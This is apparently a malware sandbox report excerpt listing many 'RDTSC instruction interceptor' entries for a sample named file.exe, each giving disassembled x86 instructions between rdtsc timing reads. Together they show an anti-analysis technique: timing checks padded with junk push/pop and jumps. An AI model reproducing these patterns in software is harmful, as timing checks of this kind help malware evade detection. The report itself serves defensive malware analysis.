Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106C13A second address: 106C142 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106C276 second address: 106C280 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7014CC2CB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106C280 second address: 106C290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F70146AC606h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106C290 second address: 106C294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106C574 second address: 106C57A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106C57A second address: 106C589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F7014CC2CB6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106C589 second address: 106C58D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106C58D second address: 106C5AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106C5AD second address: 106C5B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106C6F6 second address: 106C711 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7014CC2CC4h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1077A5D second address: 1077A6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC60Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1077A6D second address: 1077A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7014CC2CC0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1077E52 second address: 1077E85 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F70146AC606h 0x00000008 ja 00007F70146AC606h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F70146AC615h 0x00000015 pushad 0x00000016 jmp 00007F70146AC60Bh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 107800E second address: 107802B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7014CC2CB6h 0x0000000a popad 0x0000000b push edi 0x0000000c jnp 00007F7014CC2CB6h 0x00000012 jng 00007F7014CC2CB6h 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 107802B second address: 1078039 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F70146AC606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1078495 second address: 107849F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7014CC2CB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1078756 second address: 1078760 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F70146AC60Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1078F18 second address: 1078F35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7014CC2CC2h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1078F35 second address: 1078F40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F70146AC606h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10774A6 second address: 10774BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7014CC2CBFh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 107FDF4 second address: 107FDFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 107FDFC second address: 107FE02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 107FF39 second address: 107FF50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC60Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 107FF50 second address: 107FF55 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108F3D1 second address: 108F3D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1091BED second address: 1091C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jmp 00007F7014CC2CC8h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1091C0F second address: 1091C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F70146AC606h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1091C1E second address: 1091C22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109FA88 second address: 109FAA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F70146AC614h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A7116 second address: 10A711E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A711E second address: 10A7124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A7124 second address: 10A7136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7014CC2CBBh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A72B4 second address: 10A72B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A72B8 second address: 10A72BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A82F9 second address: 10A82FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10ACCB1 second address: 10ACCCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7014CC2CBCh 0x00000008 pushad 0x00000009 popad 0x0000000a jnl 00007F7014CC2CB6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AF8CF second address: 10AF920 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jg 00007F70146AC606h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F70146AC616h 0x00000012 js 00007F70146AC606h 0x00000018 popad 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c jbe 00007F70146AC60Eh 0x00000022 pushad 0x00000023 popad 0x00000024 jnc 00007F70146AC606h 0x0000002a jnl 00007F70146AC616h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AF920 second address: 10AF930 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7014CC2CC2h 0x00000008 jnl 00007F7014CC2CB6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B2CE8 second address: 10B2CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B50F5 second address: 10B5107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7014CC2CBDh 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BC450 second address: 10BC463 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F70146AC60Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BC463 second address: 10BC46F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7014CC2CB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BC46F second address: 10BC48E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F70146AC615h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C5720 second address: 10C573B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7014CC2CC5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C573B second address: 10C5748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C5748 second address: 10C574C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C0D94 second address: 10C0D98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C0D98 second address: 10C0D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C0D9E second address: 10C0DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D21CB second address: 10D21D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D22E7 second address: 10D22EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D22EF second address: 10D22FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F7014CC2CB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E6E4A second address: 10E6E4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E7139 second address: 10E714B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7014CC2CBBh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E7A2B second address: 10E7A4A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F70146AC606h 0x00000008 jmp 00007F70146AC60Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007F70146AC606h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E7A4A second address: 10E7A4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E7A4E second address: 10E7A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E7A54 second address: 10E7A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 ja 00007F7014CC2CE0h 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E7A6D second address: 10E7A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EBDFC second address: 10EBE11 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jo 00007F7014CC2CB6h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EC0AD second address: 10EC0CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC611h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnc 00007F70146AC627h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EC0CD second address: 10EC144 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F7014CC2CB8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 push 00000004h 0x00000026 pushad 0x00000027 pushad 0x00000028 adc al, 0000004Ah 0x0000002b mov ax, 9344h 0x0000002f popad 0x00000030 mov dword ptr [ebp+122D1C2Dh], eax 0x00000036 popad 0x00000037 call 00007F7014CC2CB9h 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F7014CC2CC8h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EC144 second address: 10EC16D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC614h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F70146AC60Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EC16D second address: 10EC192 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EC192 second address: 10EC198 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EC198 second address: 10EC1AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7014CC2CC1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EC1AD second address: 10EC1B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EC1B1 second address: 10EC1D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007F7014CC2CC1h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push ecx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EC48C second address: 10EC492 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EC492 second address: 10EC498 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D2027C second address: 4D202C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F70146AC60Bh 0x0000000b xor ah, 0000002Eh 0x0000000e jmp 00007F70146AC619h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F70146AC613h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D202C5 second address: 4D202CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D202CB second address: 4D202D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D202D1 second address: 4D20326 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e mov ebx, 6B6B3D20h 0x00000013 pop edi 0x00000014 call 00007F7014CC2CC6h 0x00000019 mov ax, B781h 0x0000001d pop esi 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F7014CC2CC8h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20326 second address: 4D2032C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20383 second address: 4D2039C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D2039C second address: 4D203A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D203A2 second address: 4D203C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F7014CC2CBFh 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D203C4 second address: 4D203CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D203CA second address: 4D203CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D203CF second address: 4D203F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, 62DDC4D5h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F70146AC617h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10025D6 second address: 10025DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D2044E second address: 4D20453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D2049E second address: 4D204A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D204A2 second address: 4D204A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D204A8 second address: 4D204AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D204AE second address: 4D204B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D204B2 second address: 4D204DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 71C0FB3Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D204DC second address: 4D204E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D204E2 second address: 4D204FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F7084D967B8h 0x0000000e push 74DF27D0h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov eax, dword ptr [esp+10h] 0x0000001e mov dword ptr [esp+10h], ebp 0x00000022 lea ebp, dword ptr [esp+10h] 0x00000026 sub esp, eax 0x00000028 push ebx 0x00000029 push esi 0x0000002a push edi 0x0000002b mov eax, dword ptr [74E80140h] 0x00000030 xor dword ptr [ebp-04h], eax 0x00000033 xor eax, ebp 0x00000035 push eax 0x00000036 mov dword ptr [ebp-18h], esp 0x00000039 push dword ptr [ebp-08h] 0x0000003c mov eax, dword ptr [ebp-04h] 0x0000003f mov dword ptr [ebp-04h], FFFFFFFEh 0x00000046 mov dword ptr [ebp-08h], eax 0x00000049 lea eax, dword ptr [ebp-10h] 0x0000004c mov dword ptr fs:[00000000h], eax 0x00000052 ret 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D204FB second address: 4D204FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D204FF second address: 4D20505 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D20505 second address: 4D2051D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [ebp-04h], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov dx, D178h 0x00000013 mov dx, 8D24h 0x00000017 popad 0x00000018 rdtsc
